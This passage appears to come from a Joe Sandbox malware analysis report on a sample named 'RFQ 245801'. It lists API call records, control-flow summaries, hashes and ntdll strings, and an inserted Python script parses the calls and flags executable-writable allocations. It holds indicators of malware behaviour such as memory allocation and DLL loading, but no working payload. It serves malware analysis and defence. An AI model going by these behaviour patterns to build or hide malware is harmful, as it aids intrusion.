                                                                                                                                                                                  • Opcode Fuzzy Hash: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0C272200204BFD720EFA4CC45EDB7B68EF44364F104459F90EAB242C130E511CB90
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                  • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
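The four NTDLL call records in the listing above (LdrLoadDll at 0040AD62, NtCreateFile at 0041A37D, NtAllocateVirtualMemory at 0041A549, NtClose at 0041A485, all with call sites inside the 0x400000 dump) are the part of this function listing a triager actually reads. The Python below is an added example, not part of the Joe Sandbox report and not code from the FormBook sample: it parses those records as printed on the page, names the Win32 constants captured around the NtAllocateVirtualMemory call (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE) and flags the executable+writable allocation and the native calls made from inside the dumped image. Two assumptions are labelled in the code: the sandbox prints raw stack slots rather than a typed argument list, so constants are matched by value and not by position; and the image range 0x400000-0x420000 used to decide whether a call site lies in the dump is a guess from the addresses on the page, since the report gives the base but not the size.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the four NTDLL call records from this report's
# function listing, copied as they appear on the page.
SAMPLE_LISTING = """\
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
"""

# Documented Win32 constants, used to name the captured values.
ALLOC_TYPE_NAMES: Dict[int, str] = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_TOP_DOWN"}
ALLOC_TYPE_MASK = sum(ALLOC_TYPE_NAMES)
PAGE_NAMES: Dict[int, str] = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}
PAGE_EXECUTE_READWRITE = 0x40

# One record looks like: "• Api.MODULE(arg,arg,?,...), ref: ADDRESS"
CALL_RE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]  # None where the sandbox printed '?'
    ref: int                   # call-site address inside the dump


def parse_listing(text: str) -> List[ApiCall]:
    """Extract every API record from a Joe Sandbox function listing."""
    calls = []
    for m in CALL_RE.finditer(text):
        args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",")]
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def alloc_type_name(value: int) -> str:
    """Render a MEM_* bitmask as names; bits we do not know stay as hex."""
    names = [name for bit, name in ALLOC_TYPE_NAMES.items() if value & bit]
    unknown = value & ~ALLOC_TYPE_MASK
    if unknown:
        names.append(hex(unknown))
    return "|".join(names) if names else hex(value)


def decode_alloc(call: ApiCall) -> Dict[str, object]:
    """Name the allocation type and page protection in an NtAllocateVirtualMemory record.

    Assumption: the report prints raw stack slots, not a typed argument list,
    so constants are recognised by value rather than by position.
    """
    values = [v for v in call.args if v is not None]
    alloc_types = sorted({alloc_type_name(v) for v in values if v and v == (v & ALLOC_TYPE_MASK)})
    protections = sorted({PAGE_NAMES[v] for v in values if v in PAGE_NAMES})
    return {
        "alloc_type": ", ".join(alloc_types),
        "protect": ", ".join(protections),
        "rwx": PAGE_EXECUTE_READWRITE in values,
    }


def triage(calls: List[ApiCall], image_lo: int = 0x400000, image_hi: int = 0x420000) -> List[Tuple[int, str]]:
    """Findings worth a human's time: native (ntdll) calls issued from inside the
    dumped image, and executable+writable allocations (staging memory for
    injected code). image_lo/image_hi bound the 0x400000 dump; the upper bound
    is an assumption, the report gives only the base."""
    findings = []
    for c in calls:
        if c.module == "NTDLL" and image_lo <= c.ref < image_hi:
            findings.append((c.ref, f"{c.api} (ntdll native API) called from dumped image"))
        if c.api == "NtAllocateVirtualMemory":
            d = decode_alloc(c)
            if d["rwx"]:
                findings.append((c.ref, f"RWX allocation ({d['alloc_type']}, {d['protect']})"))
    return findings


if __name__ == "__main__":
    for ref, msg in triage(parse_listing(SAMPLE_LISTING)):
        print(f"{ref:08X}  {msg}")
```

Feed it the whole function listing of a report rather than these four lines and it will surface every RWX allocation and every native call site in the unpacked region; extend ALLOC_TYPE_NAMES and PAGE_NAMES if other constants turn up, and treat the image bounds as something to confirm against the dump's actual size.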
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
• Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
• Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
• Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
• Instruction ID: ba0227ef09325f0c1c79577f04145f88b630df89539712e1318c10468169fc13
• Opcode Fuzzy Hash: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
• Instruction Fuzzy Hash: 7490023120550802D6807158840864A400597D1301F96C035A0025664DCA158B5977A2
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
• Instruction ID: f3a278736c3d0b104c3b7b95493499654c0e79b644abde0cd659de498126eb95
• Opcode Fuzzy Hash: af822ff0ca7abf6a0152b99e903ad33737f7fd5e6caf58bab666df4e0a19412b
• Instruction Fuzzy Hash: 8F900225215500030605B5584708507404697D5351756C031F1015560CD6218A615222
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
• Instruction ID: 241eb77a3f01bea4e4816fc94d0724dfb22e7d2114b791f4472a6e1b9a9fe36d
• Opcode Fuzzy Hash: 9c2506ff7880a8f1d2f8de661288ebbb2f96d90664aef1efb2c0aae20b7a6697
• Instruction Fuzzy Hash: 8990022130550003D6407158941C6068005E7E1301F56D031E0414564CD9158A565323
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
• Instruction ID: 961e57edceb6e5fb3b6fc91422f37daa204f0a112674188c222c09ddb10381dc
• Opcode Fuzzy Hash: fc24eb850970b50978852d610c4c11e7cffcb17b6e315fe70d03ab141af8da8f
• Instruction Fuzzy Hash: 5290022921750002D6807158940C60A400597D1202F96D435A0015568CC9158A695322
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
• Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
• Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
• Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
• Instruction ID: 4858db9347b7c00d9a8e49871105bdeaa2f65f55dac96da7633f0ed2fd79339e
• Opcode Fuzzy Hash: 18a6654cf013f53573050d6bb42c50a3d4df15356728c872ff80b6a972c94a08
• Instruction Fuzzy Hash: 16900221246541525A45B15884085078006A7E0241B96C032A1414960CC5269A56D722
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
• Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
• Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
• Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
• Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
• Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
• Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
• Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
• Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
• Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
• Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
• Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
• Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
• Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
• Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
• Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                                                                  • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                                                                  • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                                                                  • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                  • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                                                                  • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                                                                                                                                                  • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                  • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                  • String ID: 6EA
                                                                                                                                                                                  • API String ID: 1279760036-1400015478
                                                                                                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                  • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 212 408310-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 212->221 222 40838e-408392 212->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                  • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                  • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                  • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 243 41a791-41a79d 244 41a7a0-41a7ba call 41af30 243->244 245 41a723-41a727 243->245 249 41a7bf-41a7d4 LookupPrivilegeValueW 244->249 247 41a72f-41a744 245->247 248 41a72a call 41af30 245->248 248->247
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                  • Opcode ID: 3a095b6fdbfae34f310b3791de5d0685201296881819b5ca00dc2e276e2191ab
                                                                                                                                                                                  • Instruction ID: 4f0e51a01ab46be95e7cd7a3d039ee2e35a66bd9743fa429f2e30aff352c1da8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a095b6fdbfae34f310b3791de5d0685201296881819b5ca00dc2e276e2191ab
                                                                                                                                                                                  • Instruction Fuzzy Hash: B101ADB52102086BDB10EF59DC80DEB73A9EF88318F01845AF90957342C630E9168AB5

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 263 41a632-41a656 264 41a65c-41a671 RtlFreeHeap 263->264 265 41a657 call 41af30 263->265 265->264
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                  • Opcode ID: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                  • Instruction ID: ee930675011bf31697f300d8cbe35b02760f94f29c7344f56dc328e1a5823920
                                                                                                                                                                                  • Opcode Fuzzy Hash: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15F039B1221204ABD718EF58DC49EE777A9FF48750F118669FA485B242D631E811CBA0

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 266 41a640-41a671 call 41af30 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
Memory Dump Source
• Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
Memory Dump Source
• Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
Memory Dump Source
• Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
Memory Dump Source
• Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
Strings
• Invalid debug info address of this critical section, xrefs: 017954B6
• Critical section address., xrefs: 01795502
• Critical section debug info address, xrefs: 0179541F, 0179552E
• double initialized or corrupted critical section, xrefs: 01795508
• Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
• Thread identifier, xrefs: 0179553A
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
• Thread is in a state in which it cannot own a critical section, xrefs: 01795543
• Critical section address, xrefs: 01795425, 017954BC, 01795534
• 8, xrefs: 017952E3
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
• corrupted critical section, xrefs: 017954C2
• undeleted critical section in freed memory, xrefs: 0179542B
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
Memory Dump Source
• Source File: 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_16f0000_RFQ 245801.jbxd
Similarity
• API ID:
